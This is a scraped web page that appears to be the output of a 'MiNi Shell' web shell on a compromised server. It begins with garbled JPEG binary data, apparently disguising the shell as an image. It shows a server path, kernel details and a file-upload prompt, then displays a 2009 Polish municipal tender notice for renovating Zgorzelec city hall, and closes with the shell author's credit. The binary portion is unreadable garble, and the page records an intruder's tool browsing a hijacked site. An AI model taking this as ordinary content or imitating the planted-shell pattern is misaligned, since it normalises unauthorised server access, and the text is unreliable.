JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090717/114673-N-2009.html

<p class="kh_header"><b>Zgorzelec: Remont Urzędu Miasta Zgorzelec - Adaptacja pomieszczeń po Urzędzie Skarbowym - etap I</b><br>
<b>Numer ogłoszenia: 114673 - 2009; data zamieszczenia: 17.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont Urzędu Miasta Zgorzelec - Adaptacja pomieszczeń po Urzędzie Skarbowym - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie powyżej 14 000 euro a poniżej kwot określonych w art.11 ust.8 ustawy z dnia 29 .01. 2004r. Prawo Zamówień Publicznych
1. Przedmiotem zamówienia są roboty budowlane obejmujące roboty ogólnobudowlane wewnętrzne oraz elektryczne, związane z remontem pomieszczeń II i III piętra budynku Urzędu Miasta Zgorzelec (w tym roboty rozbiórkowe, roboty w zakresie demontażu starych instalacji elektrycznych i oświetleniowych , roboty przygotowawcze oraz roboty instalacyjne w zakresie instalacji elektrycznych i teletechnicznych).
W ramach robót ogólnobudowlanych wewnętrznych przewidziano:
 - roboty rozbiórkowe w zakresie ścian (zarówno nośnych jak i działowych), podłóg i sufitów
 - roboty demontażowe w zakresie starych instalacji elektrycznych oraz instalacji sanitarnych,
 - roboty związane ze skuciem starych tynków,
 - roboty związane z wykuciami i przekuciami w murach,
 - roboty związane z wykonaniem ścian działowych z płyt gipsowo-kartonowych,
 - roboty związane z naprawami podłóg i ścian,
 - roboty związane z zamurowaniami istniejących przebić w ścianach, 
 - roboty związane wykonaniem tynków wewnętrznych,
 - roboty związane z wykonaniem elementów nowych instalacji sanitarnych,
 - roboty związane z usunięciem z miejsca robót gruzu wraz z jego wywiezieniem na składowisko odpadów.
W ramach robót przygotowawczych oraz instalacyjnych w zakresie instalacji elektrycznych i teletechnicznych przewidziano:
 - ręczne wykucie bruzd w ścianach wraz z ich zaprawieniem,
 - ręczne przebicie otworów w ścianach i stropach,
 - ręczne wykucie wnęk w ścianach,
 - wykonanie i ułożenie w bruzdach oraz listwach, okablowań instalacji elektrycznej jednofazowej i siłowej, instalacji oświetlenia ogólnego, instalacji zasilania komputerów z UPS - a, instalacji okablowania  strukturalnego, instalacji TVK,
 - montaż osprzętu  m.in. (puszki rozgałęźne, łączniki bryzgoszczelne, łączniki podtynkowe jednobiegunowe, gniazda wtyczkowe, rozgałęźniki 3 - liniowe i 5 - liniowe, wzmacniacze o mocy do 200 W),
 - montaż rozdzielnic z osprzętem modułowym, w tym wyłączników nadprądowych,
 - wykonanie pomiarów instalacji ( w tym skuteczności zerowania),  
2. Szczegółowy opis przedmiotu zamówienia zawarto w załączonych do SIWZ:
 - projekcie budowlanym instalacji elektrycznych pomieszczeń II i III piętra budynku U.M. Zgorzelec, z wyłączeniem części związanych z:  wykonaniem instalacji klimatyzacyjnych typu SPLIT i zasilania central klimatyzacji, dostawy i montażu oświetlenia, dostawy i montażu gniazd 1-fazowych i siłowych oraz włączników podtynkowych na tych instalacjach, dostawy i montażu szafy krosowej  SK-3) - załącznik 4 do SIWZ
 - specyfikacji technicznej wykonania i odbioru robót związanych z wykonaniem instalacji elektrycznych pomieszczeń II i III piętra budynku U.M. Zgorzelec, z wyłączeniem części związanych z:  wykonaniem instalacji klimatyzacyjnych typu SPLIT i zasilania central klimatyzacji, dostawy i montażu oświetlenia, dostawy i montażu gniazd 1-fazowych i siłowych oraz włączników podtynkowych na tych instalacjach, dostawy i montażu szafy krosowej SK-3) - załącznik 1 do SIWZ
- projekcie budowlanym przebudowy pomieszczeń budynku Urzędu Miasta Zgorzelec 
- załącznik 3 do SIWZ,
- specyfikacji technicznej wykonania i odbioru robót związanych z przebudową pomieszczeń budynku Urzędu Miasta Zgorzelec - załącznik 2 do SIWZ.
3.Wykonawca zobowiązany będzie do prowadzenia w trakcie realizacji robót wymaganego Prawem Budowlanym dziennika budowy oraz książki obmiaru robót ( z uwagi na przyjęte rozliczenie kosztorysowe robót).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.12.00-0, 45.11.13.00-1, 45.23.24.60-4, 45.31.10.00-0, 45.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca  wniesie wadium w wysokości: 
8.315.- PLN (słownie: osiem tysięcy trzysta piętnaście złotych 00/100) 
2. Wadium musi obejmować okres związania ofertą.
Uwaga! Przedłużenie terminu składania ofert spowoduje, że wszelkie prawa i zobowiązania Zamawiającego i Wykonawcy  dot. w/w ustaleń będą podlegały odpowiednio nowym terminom.
3. Termin wniesienia wadium upływa przed terminem składania ofert
4. Wykonawca, który nie wniesie wadium w wymaganym terminie, w tym również na przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie okresu związania ofertą  zostanie przez Zamawiającego wykluczony z ubiegania się o udzielenie zamówienia publicznego. 
5.  W zależności od woli wykonawcy wadium może być wnoszone w formach:
a/ pieniądzu,
b/ poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c/ gwarancjach bankowych,
d/ gwarancjach ubezpieczeniowych,
e/ poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2
ustawy z dnia 09.11.2000 r. o utworzeniu PARP (Dz.U. z 2007r. Nr 42, poz. 275).
6. W przypadku wniesienia wadium w formach wymienionych w pkt. 21.5 ppkt b,c,d, i e  z treści  dokumentu musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy gwarancyjnej   nastąpi także w przypadku określonym w pkt.14.
Zabronionym jest umieszczenie w treści tego dokumentu jakiejkolwiek klauzuli lub
zapisu stanowiącego, że wypłata wadium w okolicznościach określonych w pkt.14 będzie uzależniona od dodatkowych okoliczności dowodowych, które spełnić ma 
Beneficjent. 
Gwarancja ma mieć charakter bezwarunkowy i być płatna na pierwsze wezwanie.
7. Warunkiem uznania wniesienia wadium w formach wymienionych w pkt. 5 ppkt 
b ,c, d i e  będzie załączony do oferty dokument potwierdzający wniesienie wadium do Zamawiającego.
8. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
zamawiającego Nr 35124012971111000025654013 w banku PEKAO S.A. I O/Zgorzelec. Na przelewie należy  umieścić informację : Wadium do postępowania przetargowego: Remont Urzędu Miasta Zgorzelec - Adaptacja pomieszczeń po Urzędzie Skarbowym - etap I  
Potwierdzeniem tej formy wniesienia wadium będzie oryginał dowodu wpłaty lub 
potwierdzona za zgodność z oryginałem jego kopia załączona  do oferty.
9. Wadium wniesione przez jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, uważa się za wniesione prawidłowo pod warunkiem, że wniesienie jego nastąpiło po związaniu się przez Wykonawców umową np. konsorcjum. 
10. Wadium zostanie zwrócone jeżeli:
- upłynął termin związania ofertą,
- zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie
należytego wykonania tej umowy,
-  zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały
ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
11. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy:
a/ który wycofał ofertę przed upływem terminu składania ofert,
b/ który został wykluczony z postępowania,
c/ którego oferta została odrzucona, chyba ,że wystąpią okoliczności określone w pkt.14 
12. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców, którym 
zwrócono wadium na podstawie art. 46 ust.2 pkt. 2 i 3 ustawy Prawo zamówień publicznych, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono 
czynność wykluczenia  wykonawcy lub odrzucenia oferty. Wykonawcy wniosą wadium w terminie określonym przez Zamawiającego.
13. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 w/w ustawy,  lub pełnomocnictw. 
15. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie, 
b/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących  po stronie wykonawcy.
c/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
16. Wadium wybranego wykonawcy zostanie zwrócone niezwłocznie po zawarciu przez niego umowy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.  Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia
3.  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia 
4.  Nie podlegają wykluczeniu z postępowania o zamówienie publiczne zgodnie z art.24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych
5.  Zamawiający informuje, ze w przypadku Wykonawców wspólnie ubiegających sie o udzielenie  zamówienia, musza zostać spełnione warunki, odpowiednio:
 a)  warunki określone w art. 22 ust. 1 pkt. 1 i pkt. 4 ustawy PZP musza zostać spełnione przez każdego z wykonawców wspólnie ubiegających sie o zamówienie,
b) warunki określone w art. 22 ust. 1 pkt. 2 i 3 mogą być spełnione przez każdego  z   wykonawców, kilku lub łącznie przez wszystkich wykonawców wspólnie ubiegających sie o udzielenie zamówienia,	
c) przy ocenie spełniania warunków udziału w postępowaniu, o których mowa w ppkt.  b  wielkości stanowiące o spełnianiu warunków będą zsumowane.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w oparciu o dokumenty wymagane w SIWZ  metodą spełnia / nie spełnia. Wykonawcy, którzy nie załączą dokumentu potwierdzającego spełnianie choć jednego z warunków udziału w postępowaniu zostaną, z zastrzeżeniem art. 26 ust.3 ustawy Prawo Zamówień Publicznych, wykluczeni z postępowania, a ich oferty zostaną odrzucone..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Na potwierdzenie spełniania warunku posiadania uprawnienia do wykonywania określonej  działalności lub czynności,  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, Zamawiający żąda załączenia do oferty :
a) Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenie o wpisie do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, 
b) Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy PZP, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert,
c) Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 9 ustawy PZP, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert.
Zgodnie z zapisami § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. ( Dz.U. Nr 87, poz. 605 z późn zmianami), jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.2.1.a) i c) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Zgodnie z zapisami § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. ( Dz.U. Nr 87, poz. 605 z późn zmianami), jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.2.1.b) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo  zamieszkania osoby której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo Zamówień Publicznych.
(dokument lub dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu  o udzielenie zamówienia albo składania ofert).
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o  udzielenie zamówienia albo składania ofert, 
2. Na potwierdzenie spełniania warunku posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,  Zamawiający żąda załączenia do oferty:
a) Wykazu wykonanych robot budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencji).
Zamawiający wymaga aby wykaz zawierał:
- minimum dwie roboty budowlane polegające na budowie lub wymianie instalacji elektrycznej w obiekcie, o wartości robót minimum 50.000 zł brutto każda,
- minimum dwie roboty budowlane remontowe lub wykończeniowe wewnętrzne w obiekcie, o wartości robot minimum 100.000 zł. brutto każda. 
b) Wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z  informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także  zakresu  wykonywanych przez nich  czynności,  lub załączenia pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania w/w zamówienia wraz z załączeniem dokumentów potwierdzających kwalifikacje osób lub podmiotów ujętych w wykazie.
Za wystarczające Zamawiający uzna dysponowanie minimum 1 osobą posiadającą uprawnienia do   pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w zakresie sieci i instalacji elektroenergetycznych oraz 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w zakresie konstrukcyjno-budowlanym. Osoby wymienione powyżej winny legitymować się dokumentami potwierdzającymi ich przynależność do Okręgowej Izby Inżynierów Budownictwa.
3. Na potwierdzenie spełniania warunków znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia oraz niepodlegania wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo Zamówień Publicznych, Zamawiający żąda załączenia do oferty :
a) Oświadczenia Wykonawcy, że posiada niezbędny potencjał finansowy, kadrowy, techniczny oraz doświadczenie niezbędne do realizacji zamówienia oraz, że nie podlega wykluczeniu z postępowania na podstawie art. 24  ustawy Prawo Zamówień Publicznych.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.um-zgorzelec.dolnyslask.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec 
ul. Domańskiego 7 , 59-900 Zgorzelec, Wydział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2009 godzina 13:00, miejsce: 59-900 Zgorzelec, ul. Domańskiego 7,  Punkt Obsługi Interesanta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com